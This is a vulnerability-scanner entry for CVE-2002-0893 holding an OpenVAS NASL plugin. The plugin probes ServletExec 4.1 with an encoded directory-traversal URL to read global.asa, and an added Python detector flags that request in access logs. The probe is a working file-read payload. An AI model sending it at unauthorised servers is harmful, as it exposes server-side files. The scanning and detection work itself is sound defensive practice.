openvas, Copyright (C) 2002 Matt Moore, OPENVAS:136141256231010959
History: Nov 03, 2005 - 12:00 a.m.

ServletExec 4.1 ISAPI File Reading

2005-11-03 00:00:00
plugins.openvas.org

CVSS2: 5 Medium
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE

AI Score: 6.5 Medium (Confidence: Low)
EPSS: 0.006 Low (Percentile: 79.1%)

By invoking the JSPServlet directly, it is possible to read the contents of
files within the webroot that would not normally be accessible (global.asa, for example).

# SPDX-FileCopyrightText: 2002 Matt Moore
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.10959");
  script_version("2023-08-01T13:29:10+0000");
  script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_cve_id("CVE-2002-0893");
  script_name("ServletExec 4.1 ISAPI File Reading");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2002 Matt Moore");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_xref(name:"URL", value:"ftp://ftp.newatlanta.com/public/4_1/patches/");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/4795");
  script_xref(name:"URL", value:"http://www.westpoint.ltd.uk/advisories/wp-02-0006.txt");

  script_tag(name:"solution", value:"Download Patch #9 from the linked vendor FTP.");

  script_tag(name:"summary", value:"By invoking the JSPServlet directly it is possible to read the contents of
  files within the webroot that would not normally be accessible (global.asa, for example.)");

  script_tag(name:"insight", value:"When attempting to retrieve ASP pages it is common to see many
  errors due to their similarity to JSP pages in syntax, and hence only fragments of these pages
  are returned. Text files can generally be read without problem.");

  script_tag(name:"qod_type", value:"remote_vul");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");

port = http_get_port(default:80);

# Uses global.asa as target to retrieve. Could be improved to use output of webmirror.nasl
url = "/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa";
req = http_get(item:url, port:port);
res = http_keepalive_send_recv(port:port, data:req);
if(!res)
  exit(0);

if("OBJECT RUNAT=Server" >< res) {
  report = http_report_vuln_url(port:port, url:url);
  security_message(port:port, data:report);
  exit(0);
}

exit(99);
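
A defender's view of the same request, as an added example that is not part of the plugin or of the original page: a Python scan of web access logs for direct invocations of the JSP10Servlet path followed by a `..` segment, reporting the response status so an analyst can judge whether the read succeeded. The combined-style log format, the sample lines and the function names are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Servlet path taken from the probe URL in the plugin above, lower-cased for comparison.
SERVLET_PREFIX = "/servlet/com.newatlanta.servletexec.jsp10servlet/"
# Assumed log layout: ... "METHOD target HTTP/x.y" status ...
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def normalize(target, max_rounds=3):
    """Drop the query string, percent-decode until stable, unify slashes and case."""
    path = target.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()


def is_direct_servlet_traversal(target):
    """True if the request invokes the JSP servlet directly with a '..' segment after it."""
    path = normalize(target)
    if not path.startswith(SERVLET_PREFIX):
        return False
    return ".." in path[len(SERVLET_PREFIX):].split("/")


def scan(lines):
    """Return (line_number, target, status) for each matching access-log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and is_direct_servlet_traversal(m.group("target")):
            hits.append((n, m.group("target"), int(m.group("status"))))
    return hits


# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.jsp HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa HTTP/1.1" 200 1840',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /servlet/com.newatlanta.servletexec.JSP10Servlet/hello.jsp HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for n, target, status in scan(SAMPLE_LOG):
        print(f"line {n}: status {status}: {target}")
```

A hit with status 200 and a non-trivial response size is the case to follow up first, since the plugin itself only reports when file content comes back.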
